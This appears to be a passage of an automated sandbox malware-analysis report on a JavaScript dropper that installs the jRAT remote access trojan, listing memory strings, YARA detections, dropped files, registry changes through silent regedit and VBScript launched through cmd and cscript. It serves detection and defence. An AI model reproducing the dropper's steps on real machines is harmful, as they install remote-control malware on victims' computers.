Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/eam;
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1856312997.0000000002823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-general-entities7
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-general-entitiesex
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1856312997.0000000002823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespace-prefixesna(
Source: java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespace-prefixesrn(
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespaces
Source: java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespaces&
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespacesC
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/validation
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/validationS6
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/(
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/K%
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/nt(
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/xml-stringk
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mborgerding/kissfft
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/rober42539/lao-dictionary
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/rober42539/lao-dictionary/LICENSE.txt
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/rober42539/lao-dictionary/laodict.txt
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004A45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://jrat.io
Source: java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://jrat.io#
Source: java.exe, 00000004.00000002.2955123520.000000000A09B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://jrat.ioCX
Source: java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://jrat.ios
Source: xcopy.exe, 00000012.00000003.1851166047.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org/MPL/2.0/.
Source: xcopy.exe, 00000012.00000003.1851166047.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/publicsuffix/list/3c213aab32b3c014f171b1673d4ce9b5cd72bf1c/public_
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sourceforge.net/project/?group_id=1519

System Summary

Malicious sample detected (through community Yara rule)

Source: C:\Users\user\AppData\Roaming\cmukyspiy.txt, type: DROPPED	Matched rule: Detects JRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\_0.335919510014015658379257619551515348.class, type: DROPPED	Matched rule: Detects JRAT malware Author: Florian Roth

Found suspicious ZIP file

Source: ffjcext.zip.18.dr

Zip Entry: {CAFEEFAC-0018-0000-0381-ABCDEFFEDCBA}/chrome/content/ffjcext/ffjcext.js

Uses regedit.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\XGkhOkmDsC474469576599115670.reg

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Detected potential crypto function

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_020E3758	1_2_020E3758
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_021265D0	1_2_021265D0
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 1_2_020DE709	1_2_020DE709

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll A6BE5BE2D16A24430C795FAA7AB7CC7826ED24D6D4BC74AD33DA5C2ED0C793D0
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll 8594D0EDA4E4367BC3473032552C5D0F9931C283E6C4CB8D7C1E7D9F61E13506

Java / VBScript file with very long strings (likely obfuscated code)

Source: gcahfpmhcn.js

Initial sample: Strings found which are bigger than 50

PE file does not import any functions

Source: api-ms-win-core-libraryloader-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-2-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: API-MS-Win-core-xstate-l2-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.18.dr	Static PE information: No import functions for PE file found

Yara signature match

Source: C:\Users\user\AppData\Roaming\cmukyspiy.txt, type: DROPPED	Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Source: C:\Users\user\AppData\Local\Temp\_0.335919510014015658379257619551515348.class, type: DROPPED	Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research

Source: classification engine

Classification label: mal100.phis.troj.expl.evad.winJS@184/298@1/2

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\cmukyspiy.txt

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3544:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_03

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user

Jump to behavior

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\cscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\xcopy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
